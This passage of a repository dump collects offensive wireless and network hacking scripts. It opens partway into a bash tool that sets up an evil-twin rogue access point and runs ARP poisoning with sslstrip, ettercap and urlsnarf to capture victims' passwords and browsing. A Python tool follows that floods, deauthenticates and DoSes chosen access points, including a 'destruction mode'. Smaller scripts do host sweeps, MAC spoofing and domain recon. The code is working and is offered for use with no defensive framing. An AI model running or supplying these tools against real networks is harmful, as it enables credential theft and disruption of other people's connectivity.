317 | echo -n "Enter the ESSID you would like your rogue AP to be called: "
318 | read -e ESSID
319 | clear
320 | echo -n "Name the folder you want to save your logs into "
321 | read -e SESSION
322 | clear
323 | mkdir -p /root/$SESSION
324 | clear
325 |
326 | echo $BLUE" Starting Airmon-ng and creating mon0 interface...."$STAND
327 | airmon-ng start $fakeap_interface
328 | fakeap=$fakeap_interface
329 | fakeap_interface="mon0"
330 | sleep 2
331 | clear
332 |
333 | echo $RED" [##########################################################]"
334 | echo $RED" [+][+][+] Running MITM attack vectors [+][+][+]"
335 | echo $RED" [##########################################################]"
336 | sleep 5
337 | echo ""
338 |
339 | # Dhcpd directory and dhcpd.conf creation
340 | mkdir -p "/var/run/dhcpd"
341 | echo "authoritative;
342 |
343 | default-lease-time 700;
344 | max-lease-time 8000;
345 |
346 | subnet 10.0.0.0 netmask 255.255.255.0 {
347 | option routers 10.0.0.1;
348 | option subnet-mask 255.255.255.0;
349 |
350 | option domain-name "\"$ESSID\"";
351 | option domain-name-servers 10.0.0.1;
352 |
353 | range 10.0.0.30 10.0.0.60;
354 |
355 | }" > /var/run/dhcpd/dhcpd.conf
356 |
357 | # FAKEAP setup
358 | echo $BLUE" Configuring and Starting $ESSID...."
359 | xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -P -C 60 -e "$ESSID" $fakeap_interface & fakeapid=$!
360 | sleep 3
361 | echo ""
362 |
363 | # Setup your IP Tables
364 | echo " Configuring your IP tables...."
365 | ifconfig lo up
366 | ifconfig at0 up &
367 | sleep 1
368 | ifconfig at0 10.0.0.1 netmask 255.255.255.0
369 | ifconfig at0 mtu 1400
370 | route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
371 | iptables --flush
372 | iptables --table nat --flush
373 | iptables --delete-chain
374 | iptables --table nat --delete-chain
375 | echo 1 > /proc/sys/net/ipv4/ip_forward
376 | iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
377 | iptables -P FORWARD ACCEPT
378 | iptables --append FORWARD --in-interface at0 -j ACCEPT
379 | iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
380 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
381 | echo ""
382 |
383 | # DHCP
384 | echo " Setting up DHCP to work with EVIL TWIN AP...."
385 | touch /var/run/dhcpd.pid
386 | chown dhcpd:dhcpd /var/run/dhcpd.pid
387 | xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd3 -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
388 | sleep 3
389 | echo ""
390 |
391 | # SSLstrip
392 | echo " Starting SSLstrip to enumerate user credentials...."
393 | sudo xterm -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
394 | sleep 2
395 | echo ""
396 |
397 | # Ettercap
398 | echo " Starting Ettercap to sniff client passwords...."
399 | xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
400 | sleep 3
401 | echo ""
402 |
403 | # URLSnarf
404 | echo " Starting URLSnarf to show the websites the victim browses...."
405 | xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
406 | sleep 3
407 | clear
408 |
409 | #SSLstrip.log cat the file sslstrip.log
410 | xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!
411 |
412 | clear
413 | echo
414 | echo $RED" ####################################################################"
415 | echo $RED" [ em3rgency's Fake AP SSL MITM attack is now running... ]"
416 | echo $RED" [ ]"
417 | echo $RED" [ Press Y then ENTERKEY to close kill and clean up the script ]"
418 | echo $RED" [ ]"
419 | echo $RED" [ IF not closed properly ERRORS WILL OCCUR ]"
420 | echo $RED" ####################################################################"
421 | echo $STAND""
422 | echo ""
423 | read WISH
424 |
425 | # Kill all
426 | if [ $WISH = "y" ] ; then
427 | echo
428 | echo $BLUE" Cleaning up your mess"
429 | echo ''
430 | sleep 2
431 |
432 | kill ${fakeapid}
433 | kill ${dhcpid}
434 | kill ${sslstripid}
435 | kill ${ettercapid}
436 | kill ${urlsnarfid}
437 | kill ${dritnetid}
438 | kill ${sslstriplogid}
439 |
440 | airmon-ng stop $fakeap_interface
441 | airmon-ng stop $fakeap
442 | echo "0" > /proc/sys/net/ipv4/ip_forward
443 | iptables --flush
444 | iptables --table nat --flush
445 | iptables --delete-chain
446 | iptables --table nat --delete-chain
447 | clear
448 | echo ""
449 | echo ""
450 | echo $RED" [+][+][+] Everything is now cleaned up [+][+][+]"
451 | echo $RED" [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
452 | echo $RED" [+][+][+] Coded by em3rgency [+][+][+]"$STAND
453 | sleep 5
454 |
455 | fi
456 |
457 | sleep 3
458 | clear
459 | ./911_AP.sh
460 | else
461 |
462 | # Credits to N1t0g3n for the base to this section. Thanks bro
463 | if [ $menuoption = "4" ]; then
464 | clear
465 | echo ""
466 | echo ""
467 | echo $BLUE" Finding wireless and ethernet interfaces."$STAND
468 | sleep 3
469 | echo ""
470 | ifconfig -a | cut -d " " -f1 | sed '/^$/d' | egrep -v 'lo|vm'
471 | echo ""
472 | echo ""
473 | echo "Please type the name of your wireless interface (wlan0): "
474 | read WIFACE
475 | sleep 2
476 | echo ""
477 | echo ""
478 | echo "Please type the name of your ethernet interface (eth0): "
479 | read ETH0
480 | clear
481 | echo -n "Name the folder you want to save your logs into "
482 | read -e SESSION
483 |
484 | mkdir -p /root/$SESSION
485 | clear
486 | echo ""
487 | echo ""
488 | clear
489 | echo $RED" **************************************************";
490 | echo $RED" * 1. Attack entire Gateway through LAN *";
491 | echo $RED" * 2. Attack entire Gateway through Wireless *";
492 | echo $RED" * 3. Attack single host through LAN *";
493 | echo $RED" * 4. Attack single host through Wireless *";
494 | echo $RED" * 5. Return to Main Menu *";
495 | echo $RED" **************************************************";
496 | echo $STAND""
497 | echo ""
498 | echo $BLUE" Select Menu Option: "
499 | read menuoption
500 | if [ $menuoption = "1" ]; then
501 | echo
502 | echo
503 | echo " This should be your Gateway from what I see: "
504 | echo ""
505 | echo ""
506 | route -n -A inet | grep UG
507 | echo ""
508 | echo ""
509 | echo $STAND"Please type the IP of your Gateway in below: "$STAND
510 | read GATEWAY
511 | echo $BLUE" Starting attack on Gateway"
512 | echo ""
513 | echo ""
514 | echo " Passwords will show up in ettercap window"
515 | sleep 3
516 | echo "1" > /proc/sys/net/ipv4/ip_forward
517 |
518 | # PORT redirection
519 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
520 | sleep 2
521 |
522 | # URLSnarf
523 | sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $ETH0 &
524 | sleep 2
525 |
526 | # Ettercap
527 | xterm -bg blue -fg white -geometry 80x7-0+366 -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $ETH0 -M arp:remote /$GATEWAY/ // &
528 | sleep 2
529 |
530 | # SSLstrip
531 | sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e sslstrip -f -p -k 10000 &
532 | sleep 2
533 |
534 | # SSLstrip.log cat the file sslstrip.log
535 | xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
536 | sleep 2
537 |
538 |
539 |
540 | clear
541 | echo $RED" ####################################################################"
542 | echo $RED" [ em3rgency's ARP poisoning script is now running ]"
543 | echo $RED" [ ]"
544 | echo $RED" [ Press ENTER return to the Main Menu ]"
545 | echo $RED" [ ]"
546 | echo $RED" [ IF not closed properly ERRORS WILL OCCUR ]"
547 | echo $RED" ####################################################################"$STAND
548 | read ENTERKEY
549 |
550 | killall sslstrip
551 | killall ettercap
552 | killall urlsnarf
553 | killall xterm
554 | echo "0" > /proc/sys/net/ipv4/ip_forward
555 | iptables --flush
556 | iptables --table nat --flush
557 | iptables --delete-chain
558 | iptables --table nat --delete-chain
559 |
560 | ./911_AP.sh
561 | else
562 | if [ $menuoption = "2" ]; then
563 | #This will allow you to forward packets from the router
564 | echo $BLUE" This should be your gateway from what I see: "$STAND
565 | echo ""
566 | echo ""
567 | route -n -A inet | grep UG
568 | echo ""
569 | echo ""
570 | echo $BLUE"Please type the IP of your gateway: "$STAND
571 | read GATEWAY
572 | echo $BLUE" Starting attack on gateway"
573 | echo ""
574 | echo ""
575 | echo ""
576 | echo " Passwords will show up in ettercap window"
577 | sleep 3
578 |
579 |
580 | echo "1" > /proc/sys/net/ipv4/ip_forward
581 |
582 |
583 | # URLSnarf
584 | sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
585 | sleep 2
586 |
587 | # Port redirection
588 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
589 | sleep 2
590 |
591 | # Etterap
592 | sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY/ // &
593 | sleep 2
594 |
595 | # SSLstrip
596 | sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
597 | sleep 2
598 |
599 | # SSLstrip.log cat the file sslstrip.log
600 | xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
601 | sleep 2
602 |
603 | clear
604 | echo $RED" ####################################################################"
605 | echo $RED" [ em3rgency's ARP poisoning script is now running ]"
606 | echo $RED" [ ]"
607 | echo $RED" [ Press ENTER return to the Main Menu ]"
608 | echo $RED" [ ]"
609 | echo $RED" [ IF not closed properly ERRORS WILL OCCUR ]"
610 | echo $RED" ####################################################################"$STAND
611 | read ENTERKEY
612 |
613 | killall sslstrip
614 | killall ettercap
615 | killall urlsnarf
616 | killall xterm
617 | echo "0" > /proc/sys/net/ipv4/ip_forward
618 | iptables --flush
619 | iptables --table nat --flush
620 | iptables --delete-chain
621 | iptables --table nat --delete-chain
622 |
623 | ./911_AP.sh
624 | else
625 | if [ $menuoption = "3" ]; then
626 | #This will allow you to forward packets from the router
627 | echo ""
628 | echo ""
629 | echo $BLUE" This should be your gateway from what I see: "
630 | echo ""
631 | echo ""
632 | route -n -A inet | grep UG
633 | echo ""
634 | echo ""
635 | echo $STAND"Please type the IP of your gateway: "
636 | read GATEWAY3
637 | echo ""
638 | echo ""
639 | echo "Please type the IP of the target host: "
640 | read HOST3
641 | echo ""
642 | echo $BLUE" Starting Attack on Target Host"
643 | echo ""
644 | echo ""
645 | echo " Passwords will show up in ettercap window"
646 | sleep 3
647 |
648 | echo "1" > /proc/sys/net/ipv4/ip_forward
649 |
650 | # URLsnarf
651 | sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $ETH0 &
652 | sleep 2
653 |
654 | # Port redirection
655 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
656 | sleep 2
657 |
658 | # Ettercap
659 | sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -TqM ARP:REMOTE /$GATEWAY3/ /$HOST3/ &
660 | sleep 2
661 |
662 | # SSLstrip
663 | sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
664 | sleep 2
665 |
666 | # SSLstrip.log cat the file sslstrip.log
667 | xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
668 | sleep 2
669 |
670 | clear
671 | echo $RED" ####################################################################"
672 | echo $RED" [ em3rgency's ARP poisoning script is now running ]"
673 | echo $RED" [ ]"
674 | echo $RED" [ Press ENTER return to the Main Menu ]"
675 | echo $RED" [ ]"
676 | echo $RED" [ IF not closed properly ERRORS WILL OCCUR ]"
677 | echo $RED" ####################################################################"
678 | read ENTERKEY
679 |
680 | killall sslstrip
681 | killall ettercap
682 | killall urlsnarf
683 | killall xterm
684 | echo "0" > /proc/sys/net/ipv4/ip_forward
685 | iptables --flush
686 | iptables --table nat --flush
687 | iptables --delete-chain
688 | iptables --table nat --delete-chain
689 |
690 | ./911_AP.sh
691 | else
692 | if [ $menuoption = "4" ]; then
693 | echo ""
694 | echo ""
695 | echo $BLUE"This should be your Gateway from what I see: "
696 | echo ""
697 | route -n -A inet | grep UG
698 | echo ""
699 | echo ""
700 | echo $STAND"Please type the IP of your gateway: "
701 | read GATEWAY4
702 | echo ""
703 | echo "Please type the IP of the target host: "
704 | read HOST4
705 | echo ""
706 | echo $BLUE" Starting Attack on Target Host"
707 | echo ""
708 | echo ""
709 | echo " Passwords will show up in ettercap window"
710 | sleep 3
711 |
712 | echo "1" > /proc/sys/net/ipv4/ip_forward
713 |
714 |
715 | # URLsnarf
716 | sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
717 | sleep 2
718 |
719 | # Port redirection
720 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
721 | sleep 2
722 |
723 | # Ettercap
724 | sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY4/ /$HOST4/ &
725 | sleep 2
726 |
727 | # SSLstrip
728 | sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
729 | sleep 2
730 |
731 | # SSLstrip.log cat the file sslstrip.log
732 | xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
733 | sleep 2
734 |
735 | clear
736 | echo $RED" ####################################################################"
737 | echo $RED" [ em3rgency's ARP poisoning script is now running ]"
738 | echo $RED" [ ]"
739 | echo $RED" [ Press ENTER return to the Main Menu ]"
740 | echo $RED" [ ]"
741 | echo $RED" [ IF not closed properly ERRORS WILL OCCUR ]"
742 | echo $RED" ####################################################################"
743 | read ENTERKEY
744 |
745 | killall sslstrip
746 | killall ettercap
747 | killall urlsnarf
748 | killall xterm
749 | echo "0" > /proc/sys/net/ipv4/ip_forward
750 | iptables --flush
751 | iptables --table nat --flush
752 | iptables --delete-chain
753 | iptables --table nat --delete-chain
754 |
755 | ./911_AP.sh
756 | clear
757 |
758 | echo $RED" Invalid option, you must choose 1,2,3,4 or 5.."
759 | sleep 2
760 | echo $BLUE" Re-Launching Script..."
761 | ./911_AP.sh
762 |
763 | fi
764 | fi
765 | fi
766 | fi
767 | if [ $menuoption = "5" ]; then
768 | ./911_AP.sh
769 | fi
770 | else
771 |
772 | # A script to quickly tell whose on your network in real time.
773 | if [ $menuoption = "5" ]; then
774 | clear
775 | echo $BLUE" This will show all The clients connected to The network"
776 | echo ""
777 | sleep 3
778 | clear
779 | echo
780 | echo
781 | echo $STAND"Please type the name of your network interface Example: eth0 "
782 | read IFACE;
783 | echo ""
784 | echo ""
785 | echo " This should be your gateway from what I see: "
786 | route -n -A inet | grep UG
787 | sleep 1
788 | echo ""
789 | echo ""
790 | echo $STAND"Please type in the IP address of your gateway"
791 | read GATEWAY;
792 | sleep 2
793 | clear
794 | echo ""
795 | echo ""
796 | echo ""
797 | echo $BLUE" Press CTRL C to stop close netdiscover"
798 | echo ""
799 | echo ""
800 | echo $RED" ####################################################################"
801 | echo $RED" [ em3rgency's Netdiscover script is now running ]"
802 | echo $RED" [ ]"
803 | echo $RED" [ Press ENTER return to the Main Menu ]"
804 | echo $RED" [ ]"
805 | echo $RED" [ IF not closed properly ERRORS WILL OCCUR ]"
806 | echo $RED" ####################################################################"
807 |
808 | sudo xterm -bg blue -fg white -e netdiscover -i $IFACE -r $GATEWAY/24
809 | read ENTERKEY
810 | clear
811 | ./911_AP.sh
812 |
813 | else
814 | if [ $menuoption = "6" ]; then
815 | exit
816 | fi
817 | fi
818 | fi
819 | fi
820 | fi
821 | fi
822 |
--------------------------------------------------------------------------------
/hackpack/hackpack/AP_fucker.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: Utf-8 -*-
3 | #
4 | # WIRELESS ACCESS POINT ****ER
5 | # Interactive, Multifunction, Destruction Mode Included
6 | # Name: AP-****er.py
7 | # Version: 0.4
8 | # Coded by: MatToufoutu
9 | #
10 | # Thanks to BackTrack crew, especially ShamanVirtuel for his help and ASPJ for creating mdk3
11 | #
12 | # USAGE: Launch the script as root using "python AP-****er.py", follow instructions, enjoy!
13 | # Prerequisites: Have mdk3 installed
14 | #
15 |
16 | ### IMPORTS
17 | import commands, os
18 | from sys import stdout, exit
19 | from threading import Thread
20 | from time import sleep, ctime
21 | try:
22 | import psyco
23 | psyco.profile()
24 | except ImportError:
25 | pass
26 |
27 | ### MDK3 THREADED ATTACKS CLASS
28 | class mdk3(Thread):
29 | def __init__(self, attack, attack_options):
30 | Thread.__init__(self)
31 | self.attack = attack
32 | self.iface = attack_options[0]
33 | self.essid = attack_options[1]
34 | self.bssid = attack_options[2]
35 | self.chan = attack_options[3]
36 | self.log = "ap****er.log"
37 | def bflood(self):
38 | out = open(self.log,"a")
39 | out.write("\n ----- "+ctime()+" : Launching beacon flood against %s on channel %s -----" % (self.essid, self.chan))
40 | out.close()
41 | print("\n Launching beacon flood against %s on channel %s" % (self.essid, self.chan))
42 | sleep(2)
43 | os.system("mdk3 "+self.iface+" b -n "+self.essid+" -g -w -m -c "+self.chan+" >> "+self.log)
44 | def ados(self):
45 | out = open(self.log,"a")
46 | out.write("\n ----- "+ctime()+" : Launching Auth DoS against %s -----" % (self.bssid))
47 | out.close()
48 | print("\n Launching Auth DoS against %s " % (self.bssid))
49 | sleep(2)
50 | os.system("mdk3 "+self.iface+" a -i "+self.bssid+" -m -s 1024 >> "+self.log)
51 | def amok(self):
52 | out = open(self.log,"a")
53 | out.write("\n ----- "+ctime()+" : Launching Deauth Flood 'Amok' Mode on channel %s -----" % (self.chan))
54 | out.close()
55 | print("\n Launching Deauth Flood 'Amok' Mode on channel %s" % (self.chan))
56 | sleep(2)
57 | os.system("mdk3 "+self.iface+" d -c "+self.chan+" -s 1024 >> "+self.log)
58 | def mich(self):
59 | out = open(self.log,"a")
60 | out.write("\n ----- "+ctime()+" : Launching Michael 'Shutdown' Exploitation against %s on channel %s -----" % (self.bssid, self.chan))
61 | out.close()
62 | print("\n Launching Michael 'Shutdown' Exploitation against %s on channel %s" % (self.bssid, self.chan))
63 | sleep(2)
64 | os.system("mdk3 "+self.iface+" m -t "+self.bssid+" -j -w 1 -n 1024 -s 1024 >> "+self.log)
65 | def wids(self):
66 | out = open(self.log,"a")
67 | out.write("\n ----- "+ctime()+" : Launching WIDS Confusion against %s on channel %s -----" % (self.essid, self.chan))
68 | out.close()
69 | print("\n Launching WIDS Confusion against %s on channel %s" % (self.essid, self.chan))
70 | sleep(2)
71 | os.system("mdk3 "+self.iface+" w -e "+self.essid+" -c "+self.chan+" >> "+self.log)
72 | def run(self):
73 | if self.attack == "B":
74 | self.bflood()
75 | if self.attack == "A":
76 | self.ados()
77 | if self.attack == "D":
78 | self.amok()
79 | if self.attack == "M":
80 | self.mich()
81 | if self.attack == "W":
82 | self.wids()
83 |
84 | ### AUXILIARY FUNCTIONS
85 | ## CHECK IF IFACE IS IN MONITOR MODE
86 | def check_mon(iface):
87 | for line in commands.getoutput("iwconfig "+iface).splitlines():
88 | if "Mode:Monitor" in line:
89 | return True
90 | return False
91 |
92 | ## CHECK IF BSSID IS VALID
93 | def check_mac(ap):
94 | if len(ap) != 17 or ap.count(':') != 5:
95 | return False
96 | macchar="0123456789abcdef:"
97 | for c in ap.lower():
98 | if macchar.find(c) == -1:
99 | return False
100 | return True
101 |
102 | ## CHECK IF CHANNEL IS VALID
103 | def check_chan(iface, chan):
104 | if chan.isdigit():
105 | channel=int(chan)
106 | if not channel in range(1, int(commands.getoutput("iwlist "+iface+" channel | grep channels | awk '{print $2}'"))+1):
107 | return False
108 | else:
109 | return False
110 | return True
111 |
112 | ## CLEAN EXIT
113 | def clean_exit():
114 | print;print
115 | print("\nAction aborted by user. Exiting now")
116 | for pid in commands.getoutput("ps aux | grep mdk3 | grep -v grep | awk '{print $2}'").splitlines():
117 | os.system("kill -9 "+pid)
118 | print("Hope you enjoyed it ;-)")
119 | sleep(3)
120 | os.system("clear")
121 | exit(0)
122 |
123 | ## DUMMY WAITING MESSAGE (ANIMATED)
124 | def waiter(mess):
125 | try:
126 | stdout.write("\r | "+mess)
127 | stdout.flush()
128 | sleep(0.15)
129 | stdout.write("\r / "+mess)
130 | stdout.flush()
131 | sleep(0.15)
132 | stdout.write("\r-- "+mess)
133 | stdout.flush()
134 | sleep(0.15)
135 | stdout.write("\r \\ "+mess)
136 | stdout.flush()
137 | sleep(0.15)
138 | stdout.write("\r | "+mess)
139 | stdout.flush()
140 | sleep(0.15)
141 | stdout.write("\r / "+mess)
142 | stdout.flush()
143 | sleep(0.15)
144 | stdout.write("\r-- "+mess)
145 | stdout.flush()
146 | sleep(0.15)
147 | stdout.write("\r \\ "+mess)
148 | stdout.flush()
149 | sleep(0.15)
150 | except KeyboardInterrupt:
151 | clean_exit()
152 |
153 | ### MAIN APP
154 | attackAvail = ["B", "A", "W", "D", "M", "T"]
155 | attack_opt=[]
156 |
157 | if commands.getoutput("whoami") != "root":
158 | print("This script must be run as root !")
159 | exit(0)
160 | try:
161 | os.system("clear")
162 | print("\n\t\t########## ACCESS POINT F.U.C.K.E.R ##########\n")
163 | print("Choose your Mode:\n\t - (B)eacon flood\n\t - (A)uth DoS\n\t - (W)ids confusion\n\t - (D)isassociation 'AmoK Mode'\n\t - (M)ichael shutdown exploitation\n\t - Des(T)ruction mode (USE WITH CAUTION)\n")
164 |
165 | ## GET MODE
166 | while 1:
167 | mode = raw_input("\n>>> ")
168 | if mode.upper() not in attackAvail:
169 | print(" '%s' is not a valid mode !" % mode)
170 | else:
171 | break
172 |
173 | ## GET INTERFACE
174 | while 1:
175 | iface = raw_input("\nMonitor interface to use: ")
176 | if check_mon(iface):
177 | attack_opt.append(iface)
178 | break
179 | else:
180 | print("%s is not a Monitor interface, try again or hit Ctrl+C to quit" % iface)
181 |
182 | ## GET ESSID
183 | if mode.upper() == "B" or mode.upper() == "W" or mode.upper() == "T":
184 | attack_opt.append("\""+raw_input("\nTarget ESSID: ")+"\"")
185 | else:
186 | attack_opt.append(None)
187 |
188 | ## GET BSSID
189 | if mode.upper() == "A" or mode.upper() == "M" or mode.upper() == "T":
190 | while 1:
191 | bssid = raw_input("\nTarget BSSID: ")
192 | if check_mac(bssid):
193 | attack_opt.append(bssid)
194 | break
195 | else:
196 | print("Invalid BSSID, try again or hit Ctrl+C to quit")
197 | else:
198 | attack_opt.append(None)
199 |
200 | ## GET CHANNEL
201 | if mode.upper() == "B" or mode.upper() == "D" or mode.upper() == "W" or mode.upper() == "T":
202 | while 1:
203 | channel = raw_input("\nTarget channel: ")
204 | if check_chan(iface, channel):
205 | attack_opt.append(channel)
206 | break
207 | else:
208 | print("Channel can only be 1 to 14, try again or hit Ctrl+C to quit")
209 | else:
210 | attack_opt.append(None)
211 |
212 | ## LAUNCH SELECTED ATTACK
213 | if os.path.exists("ap****er.log"):
214 | os.unlink("ap****er.log")
215 | if mode.upper() != "T":
216 | os.system('clear')
217 | mdk3(mode.upper(), attack_opt).start()
218 | sleep(1)
219 | print; print; print
220 | while 1:
221 | waiter(" ATTACK IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
222 | else:
223 | os.system('clear')
224 | print("\n\t/!\\/!\\/!\\ WARNING /!\\/!\\/!\\\n")
225 | print(" You've choosen DESTRUCTION MODE")
226 | print(" Using this mode may harm your WiFi card, use it at your own risks.")
227 | validate = raw_input(" Do you wish to continue? (y/N): ")
228 | if validate.upper() != "Y":
229 | print(" Ok, exiting now")
230 | exit(0)
231 | else:
232 | out=open("ap****er.log","a")
233 | out.write("\n ----- "+ctime()+" : Launching Destruction Combo. Target is AP %s|%s on channel %s -----" % (attack_opt[1], attack_opt[2], attack_opt[3]))
234 | out.close()
235 | print("\n Launching Destruction Combo\n Target is AP %s|%s on channel %s" % (attack_opt[1], attack_opt[2], attack_opt[3]))
236 | print(" Please be kind with your neighbours xD")
237 | mdk3("B", attack_opt).start()
238 | mdk3("A", attack_opt).start()
239 | mdk3("D", attack_opt).start()
240 | mdk3("M", attack_opt).start()
241 | ##wids may raise a segfault(internal mdk3 problem when multiple attacks apparently)
242 | #mdk3("W",attack_opt).start()
243 | sleep(1)
244 | print; print; print
245 | while 1:
246 | waiter(" DESTRUCTION COMBO IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
247 | except KeyboardInterrupt:
248 | clean_exit()
249 |
--------------------------------------------------------------------------------
/hackpack/hackpack/Find_Hosts.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | clear
4 | echo
5 | echo Find Hosts
6 | echo
7 | echo
8 | echo By Lee Baird
9 | echo March 23, 2007
10 | echo "v 0.2"
11 | echo
12 | echo "This script will find all live hosts in a Class C range."
13 | echo
14 | echo Usage: 192.168.1
15 | echo Enter the Class C range.
16 | echo
17 | read class
18 | echo
19 | echo "####################"
20 | echo
21 | for x in `seq 1 254`;do
22 | ping -c 1 $class.$x | grep "bytes from" | cut -d " " -f4 | cut -d ":" -f1 &
23 | done
24 | echo
25 |
--------------------------------------------------------------------------------
/hackpack/hackpack/MACchanger.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #MACchanger script writen by em3rgency
4 | #This script will automate the boring task of constantly changing your mac address of you NIC
5 | #It is very important you change your MAC address of you NIC if you are doing any kind of wireless pentesting.
6 |
7 |
8 | #DEFINED COLOR SETTINGS
9 | RED=$(tput setaf 1 && tput bold)
10 | GREEN=$(tput setaf 2 && tput bold)
11 | STAND=$(tput sgr0)
12 | BLUE=$(tput setaf 6 && tput bold)
13 |
14 |
15 | echo ""
16 | echo ""
17 | echo ""
18 | echo $RED" +############################################+"
19 | echo $RED" + em3rgency's MACchanger Script +"
20 | echo $RED" + +"
21 | echo $RED" + Version 1.0 +"
22 | echo $RED" + +"
23 | echo $RED" + www.em3rgency.com +"
24 | echo $RED" +############################################+"
25 | echo ""
26 | echo $BLUE" Visit http://www.em3rgency.com for updates to this script. Thanks" $BLUE
27 | echo ""
28 | echo ""
29 | echo ""
30 |
31 | echo -n " Finding your Network Interfaces for you... "$GREEN
32 | sleep 2
33 | echo ""
34 | ifconfig -a | cut -d " " -f1 | sed '/^$/d' | egrep -v 'lo|vm'
35 | echo ""
36 |
37 | echo $BLUE" Please enter the the interface you want the mac to change for EG. mon0 or wlan0: "
38 | read NIC
39 | echo ""
40 | sleep 2
41 | clear
42 |
43 |
44 | echo $RED" +############################################+"
45 | echo $RED" + em3rgency's MACchanger Script +"
46 | echo $RED" + +"
47 | echo $RED" + Version 1.0 +"
48 | echo $RED" + +"
49 | echo $RED" + www.em3rgency.com +"
50 | echo $RED" +############################################+"
51 | echo ""
52 | echo $BLUE" Visit http://www.em3rgency.com for updates to this script. Thanks" $BLUE
53 | echo ""
54 | echo ""
55 | echo ""
56 | sleep 2
57 | echo " Taking Your Interface Down... "
58 | ifconfig $NIC down
59 | sleep 2
60 | echo ""
61 | echo ""
62 | echo " Changing your MAC address... "
63 | macchanger -r $NIC
64 | sleep 2
65 | echo ""
66 | echo ""
67 | echo " Bringing your Interface Up... "
68 | ifconfig $NIC up
69 | echo ""
70 | echo ""
71 | echo "Your Mac is now random Thank you for using MAC changer! "
72 | echo ""
73 | echo ""
74 | read -p "Please press ENTER to exit the script"
75 |
76 |
77 |
78 |
--------------------------------------------------------------------------------
/hackpack/hackpack/Recon.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | clear
4 | echo
5 | echo Recon
6 | echo
7 | echo
8 | echo By Lee Baird
9 | echo March 26, 2009
10 | echo "v 0.11"
11 | echo
12 | echo "This script will perform various reconnaissance on your target."
13 | echo
14 | echo Usage: domain.com
15 | echo Enter the domain.
16 | echo
17 | read domain
18 | echo
19 | echo "###########################################################################################"
20 | echo
21 | echo "whois" $domain
22 | whois $domain
23 | echo "###########################################################################################"
24 | echo
25 | echo "dig" $domain "any"
26 | dig $domain any
27 | echo "###########################################################################################"
28 | echo
29 | echo "host -l" $domain
30 | echo
31 | host -l $domain
32 | echo
33 | echo "###########################################################################################"
34 | echo
35 | echo "tcptraceroute -i eth0" $domain
36 | echo
37 | tcptraceroute -i eth0 $domain
38 | echo
39 | echo "###########################################################################################"
40 | echo
41 | echo "cd /pentest/enumeration/dnsenum"
42 | echo "perl dnsenum.pl --enum -f dns.txt --update a -r" $domain
43 | echo
44 | cd /pentest/enumeration/dnsenum
